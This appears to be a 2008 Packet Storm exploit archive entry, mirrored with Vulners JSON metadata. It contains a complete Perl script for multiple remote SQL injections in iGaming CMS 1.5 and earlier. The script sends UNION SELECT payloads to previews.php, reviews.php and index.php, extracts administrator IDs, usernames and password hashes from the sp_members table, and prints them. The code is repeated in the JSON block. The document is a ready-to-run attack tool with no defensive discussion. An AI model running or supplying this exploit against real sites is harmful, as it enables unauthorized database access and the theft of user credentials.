Search...

igamingcms-sql.txt

2008-09-24T00:00:00

ID PACKETSTORM:70268
Type packetstorm
Reporter StAkeR
Modified 2008-09-24T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
# ----------------------------------------------------------  
# iGaming &lt;= 1.5 Multiple Remote SQL Injection Exploit  
# Perl Exploit - Output: id:admin:password  
# Discovered On: 23/09/2008  
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it  
# Proud To Be Italian   
# ----------------------------------------------------------  
# Usage: perl exploit.pl http://localhost/iGaming  
# ----------------------------------------------------------  
  
use strict;  
use LWP::UserAgent;  
  
my ($one,$two,$exec,$host,$http,$xxx,$view);  
  
$view = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*";  
$exec = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*";  
$host = shift @ARGV;  
$http = new LWP::UserAgent or die $!;  
$http-&gt;agent("Mozilla/4.5 [en] (Win95; U)");  
$http-&gt;timeout(1);  
  
  
if($host !~ /^http:\/\/(.+?)$/)  
{  
print "[?] iGaming CMS &lt;= 1.5 Multiple Remote SQL Injection Exploit\n";  
print "[?] Usage: perl $0 http://[path]\n";  
exit;  
}  
else  
{  
$one = $http-&gt;get($host.'/previews.php?browse='.$exec);  
$two = $http-&gt;get($host.'/reviews.php?browse='.$exec);  
$xxx = $http-&gt;get($host.'/index.php?do=viewarticle&id='.$view);  
  
if($one-&gt;is_success or $two-&gt;is_success or $xxx-&gt;is_success)  
{  
die "$1\n" if $one-&gt;content =~ /%(.+?)%/;  
die "$1\n" if $two-&gt;content =~ /%(.+?)%/;  
die "$1\n" if $xxx-&gt;content =~ /%(.+?)%/;  
}  
else  
{  
die "[+] Exploit Failed!\n";  
}  
}   
  
  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/70268/igamingcms-sql.txt", "sourceData": "`#!/usr/bin/perl \n# ---------------------------------------------------------- \n# iGaming <= 1.5 Multiple Remote SQL Injection Exploit \n# Perl Exploit - Output: id:admin:password \n# Discovered On: 23/09/2008 \n# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it \n# Proud To Be Italian \n# ---------------------------------------------------------- \n# Usage: perl exploit.pl http://localhost/iGaming \n# ---------------------------------------------------------- \n \nuse strict; \nuse LWP::UserAgent; \n \nmy ($one,$two,$exec,$host,$http,$xxx,$view); \n \n$view = \"'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*\"; \n$exec = \"'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*\"; \n$host = shift @ARGV; \n$http = new LWP::UserAgent or die $!; \n$http->agent(\"Mozilla/4.5 [en] (Win95; U)\"); \n$http->timeout(1); \n \n \nif($host !~ /^http:\\/\\/(.+?)$/) \n{ \nprint \"[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\\n\"; \nprint \"[?] Usage: perl $0 http://[path]\\n\"; \nexit; \n} \nelse \n{ \n$one = $http->get($host.'/previews.php?browse='.$exec); \n$two = $http->get($host.'/reviews.php?browse='.$exec); \n$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view); \n \nif($one->is_success or $two->is_success or $xxx->is_success) \n{ \ndie \"$1\\n\" if $one->content =~ /%(.+?)%/; \ndie \"$1\\n\" if $two->content =~ /%(.+?)%/; \ndie \"$1\\n\" if $xxx->content =~ /%(.+?)%/; \n} \nelse \n{ \ndie \"[+] Exploit Failed!\\n\"; \n} \n} \n \n \n`\n", "edition": 1, "references": [], "modified": "2008-09-24T00:00:00", "hash": "e076df04dbb1b016d07c6b95e38b7a7d783c0a11de75b98391330b58b8521a71", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/70268/igamingcms-sql.txt.html", "description": "", "id": "PACKETSTORM:70268", "reporter": "StAkeR", "lastseen": "2016-11-03T10:16:42", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "igamingcms-sql.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "5d8f4179ff483de09207d40cdae5bd1f", "key": "href"}, {"hash": "edf1b6a53fd87b87cff375a68b75411d", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "edf1b6a53fd87b87cff375a68b75411d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e2bf4418b9caf97eac2562e25de15c28", "key": "reporter"}, {"hash": "e76438d97ecc8c716d1386565b0df60a", "key": "sourceData"}, {"hash": "1bd3eee317b49206751adbaf69cefe3e", "key": "sourceHref"}, {"hash": "c9f83cbf3544606d1061cd186aae625f", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}